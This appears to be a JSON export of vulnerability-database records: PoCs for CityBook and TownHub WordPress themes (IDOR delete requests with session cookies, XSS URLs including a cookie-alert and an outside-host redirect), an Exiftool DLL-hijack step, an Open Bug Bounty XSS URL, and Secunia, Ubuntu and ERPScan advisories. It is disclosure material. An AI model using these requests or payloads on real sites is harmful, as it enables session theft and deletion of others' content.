X-Requested-With: XMLHttpRequest Content-Length: 84 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779 Pragma: no-cache Cache-Control: no-cache lid=1770&amp;action;=citybook_addons_delete_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for tag). \\----[]- IDOR #1: -[]---- Remove the \u00abFeatured\u00bb option for any listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: citybook2.cththemes.com User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 101 Origin: https://citybook2.cththemes.com DNT: 1 Connection: close Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779 lid=1739&amp;lfeatured;=true&amp;action;=citybook_addons_featured_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for tag).\n", "modified": "2020-09-22T07:40:43", "published": "2020-01-09T00:00:00", "id": "WPVDB-ID:10013", "href": "https://wpvulndb.com/vulnerabilities/10013", "type": "wpvulndb", "title": "CityBook < 2.3.4 - Multiple Vulnerabilities", "sourceData": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-09T22:04:08", "bulletinFamily": "software", "cvelist": ["CVE-2019-20209", "CVE-2019-20210", "CVE-2019-20211", "CVE-2019-20212"], "description": "Multiple vulnerabilities was discovered in the \u00abTownHub - Directory & Listing WordPress Theme\u00bb, tested version \u2014 v1.0.2: \\- Unauthenticated XSS \\- Authenticated Persistent XSS \\- IDOR Edit (WPScanTeam): December 27h, 2019 - Envato Contacted January 5th, 2020 - Envato Investigating January 6th, 2020 - v1.0.6 released\n\n### PoC\n\n\\----[]- Info: -[]---- Demo website: https://townhub.cththemes.com/ Demo account: m0ze2/asdasd (login/password) PoC listing: https://townhub.cththemes.com/dashboard/?dashboard=listings Google Dork: /wp-content/themes/townhub/ Date: 27/12/2019 \\----[]- Reflected XSS: -[]---- Input field with placeholder \u00abWhat are you looking for?\u00bb on the homepage is vulnerable. Same thing with a regular search (block near website logo). Payload Sample #0:  Payload Sample #1:  PoC #0: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&amp;location;_search=&amp;nearby;=off&amp;address;_lat=&amp;address;_lng=&amp;distance;=10&amp;lcats;%5B%5D= PoC #1: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&amp;location;_search=&amp;nearby;=off&amp;address;_lat=&amp;address;_lng=&amp;distance;=10&amp;lcats;%5B%5D= \\----[]- Persistent XSS -> Chat: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://townhub.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner). Payload Sample #0:  Payload Sample #1:  \\----[]- Persistent XSS -> Listing page: -[]---- Add new listing here https://townhub.cththemes.com/submit-listing/#/ (first time you need to order a \u00abFree\u00bb plan and go to this URL again). Vulnerable input fields: \u00abAddress\u00bb, \u00abLatitude (Drag marker on the map)\u00bb, \u00abLongitude (Drag marker on the map)\u00bb, \u00abEmail Address\u00bb, \u00abPhone Number\u00bb and \u00abWebsite\u00bb. Payload inside \u00abAddress\u00bb, \u00abLatitude (Drag marker on the map)\u00bb and \u00abLongitude (Drag marker on the map)\u00bb input fields also works on the admin dashboard, so it's possible to steal administrator cookies. Payload Sample #0: \"> Payload Sample #1: \">\n\n# Greetings from m0ze\n\nPayload Sample #2: \"> \\----[]- IDOR: -[]---- Delete any post/page/listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: townhub.cththemes.com User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 83 Origin: https://townhub.cththemes.com DNT: 1 Connection: close Referer: https://townhub.cththemes.com/dashboard/?dashboard=listings Cookie: _your_cookies_here_ Pragma: no-cache Cache-Control: no-cache lid=XXXX&amp;action;=townhub_addons_delete_listing&_nonce=3fb56225d8&_wpnonce=3fb56225d8 Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for tag).\n", "modified": "2020-09-22T07:40:47", "published": "2020-01-09T00:00:00", "id": "WPVDB-ID:10014", "href": "https://wpvulndb.com/vulnerabilities/10014", "type": "wpvulndb", "title": "TownHub < 1.0.6 - Multiple Vulnerabilities", "sourceData": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-12-25T18:50:54", "description": "", "published": "2018-12-21T00:00:00", "type": "packetstorm", "title": "Exiftool 8.3.2.0 DLL Hijacking", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-20211"], "modified": "2018-12-21T00:00:00", "id": "PACKETSTORM:150892", "href": "https://packetstormsecurity.com/files/150892/Exiftool-8.3.2.0-DLL-Hijacking.html", "sourceData": "`<!-- \n# Exploit Title: DLL Hijacking in Exiftool v8.3.2.0 \n# Date: 18-12-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://owl.phy.queensu.ca/~phil/exiftool/ \n# Software Link: http://owl.phy.queensu.ca/~phil/exiftool/ \n# Version: v8.3.2.0 \n# Tested on: all \n# CVE : CVE-2018-20211 \n# Category: webapps \n \n1. Description \n \nExifTool 8.32 allows local users to gain privileges by creating a \n%TEMP%\\par-%username%\\cache-exiftool-8.32 folder with a victim's username, \nand then copying a Trojan horse ws32_32.dll file into this new folder, aka \nDLL Hijacking. NOTE: 8.32 is an obsolete version from 2010 (9.x was \nreleased starting in 2012, and 10.x was released \nstarting in 2015). \n \n \n2. Proof of Concept \n \necho %TEMP% \nc:\\windows\\temp \n \ncopy malicious.dll %TEMP%\\par-%username%\\cache-exiftool-8.32\\ws32_32.dll \n \nExecute application \\\\server\\share\\exiftool\\exiftool.exe or directly the \napplication. \n \n \n3. Solution: \n \nThis application is deprecated. Use the last, v11.22. \n \n--> \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150892/exiftool8320-dllhijack.txt"}], "openbugbounty": [{"lastseen": "2018-08-15T21:36:03", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Open Bug Bounty ID: OBB-236580\n\nDescription| Value \n---|--- \nAffected Website:| old.uofn.edu \nOpen Bug Bounty Program:| Create your bounty program now. It's open and free. \nVulnerable Application:| Custom Code \nVulnerability Type:| XSS (Cross Site Scripting) / CWE-79 \nCVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] \nRemediation Guide:| OWASP XSS Prevention Cheat Sheet \n \n##### Vulnerable URL:\n \n \n http://old.uofn.edu/colleges/dates.asp?CollegeCode=DSP%3C!%27/*%22/*\\%27/*\\%22/*--%3E%3C/Script%3E%3CImage%20Srcset=K%20*/;%20Onerror=confirm`OPENBUGBOUNTY`%20//%3E&CollegeType;=&CourseCode;=DSP%20211%2F212&FD;=Yes#\n \n\n##### Coordinated Disclosure Timeline\n\nDescription| Value \n---|--- \nVulnerability Reported:| 13 May, 2017 22:05 GMT \nVulnerability Verified:| 15 May, 2017 06:17 GMT \nWebsite Operator Notified:| 15 May, 2017 06:17 GMT \nPublic Report Published[without any technical details]:| 15 May, 2017 06:17 GMT \nVulnerability Fixed:| 30 November, -0001 00:00 GMT \nPublic Disclosure: A security researcher can delete the report before public disclosure, afterwards the report cannot be deleted or modified anymore. The researcher can also postpone public disclosure date as long as reasonably required to remediate the vulnerability.| 12 June, 2017 22:05 GMT\n", "modified": "2017-06-12T22:05:00", "published": "2017-05-13T22:05:00", "id": "OBB:236580", "href": "https://www.openbugbounty.org/reports/236580/", "type": "openbugbounty", "title": "old.uofn.edu XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research &#40;now part of Flexera Software&#41; 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1&#41; Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2&#41; Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3&#41; Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS &#40;Denial of Service&#41; and compromise an application using the SDK.\r\n\r\n1&#41; An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2&#41; An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4&#41; Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5&#41; Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6&#41; Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research &#40;now part\r\nof Flexera Software&#41;.\r\n\r\n======================================================================\r\n\r\n7&#41; References\r\n\r\nThe Common Vulnerabilities and Exposures &#40;CVE&#41; project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8&#41; About Secunia &#40;now part of Flexera Software&#41;\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9&#41; Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. &#40;CVE-2015-7803, CVE-2015-7804&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector &#40;Related exploit range&#41; Network &#40;N&#41;\r\nAC : Access Complexity &#40;Required attack complexity&#41; Medium &#40;M&#41;\r\nAu : Authentication &#40;Level of authentication needed to exploit&#41; None &#40;N&#41;\r\nC : Impact to Confidentiality Partial &#40;P&#41;\r\nI : Impact to Integrity Partial &#40;P&#41;\r\nA : Impact to Availability Partial &#40;P&#41;\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1&#41; An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2&#41; An attacker can perform a DoS attack &#40;for example, XML Entity Expansion&#41;.\r\n3&#41; An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin &#40;ERPScan&#41;\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions &#40;200 of them just in SAP!&#41;.\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities &#40;TOP 10 Web Hacking Techniques 2012&#41; and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}